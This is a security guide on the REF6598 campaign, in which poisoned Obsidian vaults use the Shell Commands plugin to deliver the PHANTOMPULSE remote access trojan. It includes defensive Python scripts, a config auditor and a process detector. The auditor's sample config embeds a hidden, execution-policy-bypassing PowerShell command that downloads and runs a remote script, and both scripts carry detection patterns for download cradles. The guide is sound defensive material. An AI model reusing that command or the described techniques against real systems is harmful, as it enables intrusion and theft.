Obsidian Plugin Abused to Deploy PhantomPulse RAT — Security Guide 2026
Published: 2026-05-11 Reading: 10 min Security / Supply Chain Attack
Event Overview — REF6598 Campaign
In April 2026, Elastic Security Labs disclosed a novel social engineering campaign tracked as REF6598 that abuses Obsidian, the popular cross-platform note-taking application, as an initial access vector to deliver a previously undocumented Windows remote access trojan called PHANTOMPULSE.
This campaign specifically targets individuals in the financial and cryptocurrency sectors. Rather than exploiting a software vulnerability, the attackers abused Obsidian's legitimate community plugin ecosystem — specifically the Shell Commands and Hider plugins — to silently execute malicious code when a victim opens a shared cloud vault. The attack chain includes an AI-assisted Windows backdoor that uses the Ethereum blockchain for command-and-control (C2) resolution.
The intrusion was detected and blocked early by Elastic Defend, but the technique is significant because it bypasses traditional security controls entirely by relying on the application's intended functionality. After Elastic's disclosure, the story hit the Hacker News front page, sparking widespread discussion about supply chain risks in the note-taking app ecosystem.
Attack Chain: How It Works
The REF6598 attack chain is cleverly designed and consists of multiple stages, with dedicated paths for both Windows and macOS:
Stage 0: Vault Poisoning
The attacker creates a malicious Obsidian vault hosted in cloud storage. Inside the vault's .obsidian/plugins/ directory, they install two community plugins:
- Shell Commands — a legitimate plugin that executes shell commands based on configurable triggers (startup, close, timed intervals)
- Hider — a UI-cleanup plugin that hides interface elements (status bar, tabs, scrollbars, tooltips) to conceal malicious activity
The data.json configuration file contains PowerShell commands set to execute on vault open.
Stage 1: PowerShell Execution
When the victim opens the vault, the Shell Commands plugin executes its pre-configured PowerShell commands via Invoke-Expression with Base64-encoded payloads. These commands:
- Download script1.ps1 from a hardcoded IP address (195.3.222[.]251)
- Execute the script with suppressed windows and bypassed execution policy
Stage 2: Loader Download & Operator Notification
The downloaded script uses BitsTransfer to fetch the next-stage binary (syncobs.exe) and reports progress back to the C2 with status codes:
- GFILE FOUND ON PC — download succeeded
- RDOWNLOAD ERROR — download failed, retrying
- GLAUNCH SUCCESS — binary executed
- GSESSION CLOSED — sequence completed
The tag parameter #OBSIDIAN identifies the infection vector, suggesting the operators may be running multiple concurrent campaigns using different lures.
Stage 3: PHANTOMPULL Loader
The downloaded syncobs.exe is a custom in-memory loader called PHANTOMPULL. It:
- Extracts an AES-256-CBC encrypted PE payload from its resources
- Decrypts and reflectively loads it entirely in memory
- Uses timer queue callback execution for stealth
- Contains fake integrity checks with dead code designed to waste analysts' time
This loader then connects to panel.fefea22134[.]net over HTTPS to download and decrypt the final PHANTOMPULSE payload.
Social Engineering Tactic: Fake Venture Capital Firm
The social engineering component is the most sophisticated part of this campaign. Attackers:
- Contact targets on LinkedIn under the guise of a venture capital firm
- Move the conversation to a Telegram group with multiple purported partners
- Discuss cryptocurrency liquidity solutions to create plausible business context
- Instruct the target to use Obsidian as the firm's "management database"
- Provide Obsidian account credentials for a shared cloud vault
The critical social engineering step: the victim must manually enable "Installed community plugins" sync in Obsidian settings. By default, this is disabled and cannot be turned on remotely. The attacker must convince the target to enable it, at which point the malicious plugin configuration syncs down and executes.
PhantomPulse RAT: AI-Generated Backdoor with Blockchain C2
PHANTOMPULSE is a full-featured Windows remote access trojan that Elastic Security Labs describes as "heavily AI-generated." Its standout features include:
Ethereum Blockchain C2 Resolution
Instead of a hardcoded C2 server address, PHANTOMPULSE resolves its command-and-control endpoint by:
- Fetching the latest Ethereum transaction from a hardcoded wallet address
- Extracting the C2 server address from transaction data
- Using WinHTTP for encrypted communications with the resolved server
This technique makes domain-based blocking insufficient — the C2 address changes with every new Ethereum transaction, providing attackers with nearly instant infrastructure rotation.
Capabilities
Once active, PHANTOMPULSE supports comprehensive remote access:
- inject — inject shellcode/DLL/EXE into running processes
- drop — drop files to disk and execute
- screenshot — capture and upload screenshots
- keylog — start/stop keystroke logging
- elevate — escalate privileges to SYSTEM via COM elevation moniker
- downgrade — transition from SYSTEM to elevated admin
- uninstall — remove persistence and clean up
Elastic Security Labs noted they identified a weakness in the C2 mechanism that allows security responders to take over the implants — a critical detail for defensive teams.
Cross-Platform Targeting: Windows & macOS
Attackers didn't stop at Windows. The macOS execution path uses:
- An obfuscated AppleScript dropper delivered via Shell Commands
- Iteration over a hardcoded domain list for C2 contact
- Telegram as a dead drop resolver for fallback C2 resolution
- Second-stage payload download via osascript
This dual-platform approach demonstrates the attackers' investment in making the campaign effective regardless of the target's operating system.
How Obsidian Users Can Protect Themselves
The REF6598 campaign highlights a critical lesson: even legitimate plugins in trusted applications can be weaponized. Here's how to stay safe:
1. Verify Plugin Sources Before Installing
- Only install plugins from the official Obsidian community plugin directory
- Check the plugin's GitHub repository for stars, recent activity, and maintainer reputation
- Be wary of plugins with minimal documentation or suspiciously new repositories
- Review the plugin's permissions and what system access it requests
2. Never Enable Community Plugin Sync for Untrusted Vaults
- The "Installed community plugins" and "Active community plugin list" sync toggles should be enabled only for vaults you trust
- If someone you don't know personally asks you to enable these settings, treat it as a major red flag
- Consider keeping these sync toggles disabled by default, enabling them only when you have explicitly installed and vetted the plugins yourself
3. Audit Your Shell Commands Plugin Configuration
- Regularly review the data.json file in .obsidian/plugins/obsidian-shellcommands/
- Check for any unexpected shell commands configured to run on startup or at intervals
- Remove the Shell Commands plugin if you don't actively use it
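The audit above can be scripted. The following is an added example written for this guide (not code from Elastic or the Shell Commands plugin project): it walks every string in a data.json, expands any Base64-encoded PowerShell argument (UTF-16LE, as -EncodedCommand expects), and flags the indicators this campaign relied on (hidden windows, execution-policy bypass, Invoke-Expression download cradles, BitsTransfer, osascript). The sample config and its field names are constructed for illustration; the scanner does not depend on the plugin's real schema.

```python
import base64
import json
import re

# Constructed sample of a Shell Commands data.json. Field names (shell_commands,
# shell_command, events) are assumptions; the scanner walks any JSON shape.
SAMPLE_DATA_JSON = json.dumps({
    "shell_commands": [
        {"id": "a1", "shell_command": "git pull",
         "events": {"after-obsidian-starts": {"enabled": True}}},
        {"id": "b2",
         "shell_command": "powershell -WindowStyle Hidden -ExecutionPolicy Bypass -EncodedCommand "
         + base64.b64encode("Invoke-Expression (Invoke-WebRequest http://203.0.113.10/script1.ps1).Content"
                            .encode("utf-16-le")).decode(),
         "events": {"after-obsidian-starts": {"enabled": True}}},
    ]
})

# Indicators seen in the REF6598 chain plus common download-cradle keywords.
SUSPICIOUS = re.compile(
    r"invoke-expression|\biex\b|downloadstring|invoke-webrequest|frombase64string|"
    r"-e(nc|ncodedcommand)?\b|windowstyle hidden|-w hidden|executionpolicy bypass|-ep bypass|"
    r"bitstransfer|osascript|curl |wget ", re.IGNORECASE)

def decode_encoded_commands(cmd):
    """Return decoded UTF-16LE payloads for -EncodedCommand / -enc / -e arguments."""
    decoded = []
    for blob in re.findall(r"-e(?:nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})", cmd, re.IGNORECASE):
        try:
            decoded.append(base64.b64decode(blob).decode("utf-16-le"))
        except (ValueError, UnicodeDecodeError):
            continue  # not valid Base64/UTF-16LE; the raw string is still checked below
    return decoded

def _walk(node, path=""):
    """Yield (json_path, string_value) for every string leaf in the document."""
    if isinstance(node, dict):
        for key, value in node.items():
            yield from _walk(value, f"{path}.{key}")
    elif isinstance(node, list):
        for i, value in enumerate(node):
            yield from _walk(value, f"{path}[{i}]")
    elif isinstance(node, str):
        yield path, node

def audit_shell_commands(data_json_text):
    """Flag config strings matching SUSPICIOUS, after expanding encoded payloads."""
    findings = []
    for path, value in _walk(json.loads(data_json_text)):
        decoded = decode_encoded_commands(value)
        if SUSPICIOUS.search(" ".join([value] + decoded)):
            findings.append({"path": path, "command": value, "decoded": decoded})
    return findings

if __name__ == "__main__":
    for finding in audit_shell_commands(SAMPLE_DATA_JSON):
        print(finding["path"], "->", finding["decoded"] or finding["command"])
```

Run it against each vault's .obsidian/plugins/obsidian-shellcommands/data.json; anything it reports that you did not configure yourself warrants removing the plugin from that vault.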
4. Use Endpoint Detection and Response (EDR)
- As Elastic demonstrated, behavior-based detection (not signature-based) is critical
- Monitor for PowerShell execution with Obsidian as the parent process
- Flag unexpected outbound network connections from Obsidian
- Consider using application whitelisting to prevent untrusted binary execution
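The parent-process rule above, as an added example for this guide (not an Elastic Defend rule or code from the original report): it scores process-creation events where Obsidian spawns a shell interpreter on Windows or macOS, raising severity when the command line carries the flags used in this campaign. The events are constructed samples using simplified Sysmon-style field names (ParentImage, Image, CommandLine); map them to your own telemetry.

```python
import re

# Constructed sample process-creation events (Sysmon Event ID 1 style, simplified).
SAMPLE_EVENTS = [
    {"host": "ws01", "ParentImage": r"C:\Users\a\AppData\Local\Obsidian\Obsidian.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -WindowStyle Hidden -ExecutionPolicy Bypass "
                    "-EncodedCommand SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"},  # constructed blob
    {"host": "ws01", "ParentImage": r"C:\Windows\explorer.exe",
     "Image": r"C:\Users\a\AppData\Local\Obsidian\Obsidian.exe", "CommandLine": "Obsidian.exe"},
    {"host": "ws02", "ParentImage": r"C:\Program Files\Git\git-bash.exe",
     "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "powershell.exe -Command Get-Date"},
    {"host": "mac01", "ParentImage": "/Applications/Obsidian.app/Contents/MacOS/Obsidian",
     "Image": "/usr/bin/osascript", "CommandLine": "osascript -e 'do shell script ...'"},
    {"host": "ws03", "ParentImage": r"C:\Users\b\AppData\Local\Obsidian\Obsidian.exe",
     "Image": r"C:\Windows\System32\cmd.exe", "CommandLine": "cmd.exe /c git pull"},
]

OBSIDIAN = re.compile(r"(^|[\\/])obsidian(\.exe)?$", re.I)
SHELLS = re.compile(r"(^|[\\/])(powershell|pwsh|cmd|osascript|sh|bash|zsh)(\.exe)?$", re.I)
# Command-line traits from the REF6598 Windows and macOS paths.
FLAGS = {
    "hidden_window": re.compile(r"-w(indowstyle)?\s+hidden", re.I),
    "policy_bypass": re.compile(r"-e(xecutionpolicy|p)\s+bypass", re.I),
    "encoded_command": re.compile(r"-e(nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}", re.I),
    "download_cradle": re.compile(r"invoke-expression|\biex\b|downloadstring|invoke-webrequest|bitstransfer|curl|wget", re.I),
    "osascript": re.compile(r"osascript", re.I),
}

def score_event(ev):
    """Return (severity, reasons) when Obsidian is the parent of a shell; otherwise None."""
    if not (OBSIDIAN.search(ev["ParentImage"]) and SHELLS.search(ev["Image"])):
        return None
    reasons = [name for name, rx in FLAGS.items() if rx.search(ev["CommandLine"])]
    # Any shell under Obsidian deserves a look (e.g. a legitimate git sync), but
    # hidden/bypass/encoded/osascript traits match the campaign and rank high.
    return ("high" if reasons else "medium"), reasons

def detect(events):
    """Return (host, severity, reasons) for every event that matches the rule."""
    hits = []
    for ev in events:
        result = score_event(ev)
        if result:
            hits.append((ev["host"], *result))
    return hits

if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```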
5. Practice Good Security Hygiene
- Never use work credentials to access applications at someone else's request
- Treat unsolicited LinkedIn messages leading to Telegram groups as potentially malicious
- Keep your Obsidian application and all plugins updated to the latest versions
- Use a security solution that monitors for suspicious child process execution from trusted applications
6. For Organizations
- Establish clear policies around the use of personal productivity tools for business purposes
- Consider blocking or monitoring Obsidian community plugin sync over corporate networks
- Train employees on this specific attack vector — the LinkedIn → Telegram → Obsidian chain
- Deploy EDR solutions that can detect AI-generated malware and advanced injection techniques
Summary
The REF6598 campaign represents a new class of supply chain attack that abuses legitimate application features rather than software vulnerabilities. By weaponizing Obsidian's community plugin ecosystem, attackers can execute arbitrary code through a signed, trusted Electron application — making traditional signature-based detection largely ineffective.
Key takeaways:
- Social engineering remains the hardest security problem — the attacker's approach to gaining trust through LinkedIn and Telegram was carefully crafted
- Plugin ecosystems in productivity apps are an emerging attack surface — what happens with Obsidian today could happen with other platforms tomorrow
- Behavior-based detection is essential — Elastic Defend caught this attack by monitoring for abnormal process execution patterns from trusted parent processes
- Blockchain-powered C2 is an increasingly popular evasion technique among malware authors
Source: Elastic Security Labs — Phantom in the Vault
Additional coverage: The Hacker News — Obsidian Plugin Abuse Delivers PHANTOMPULSE RAT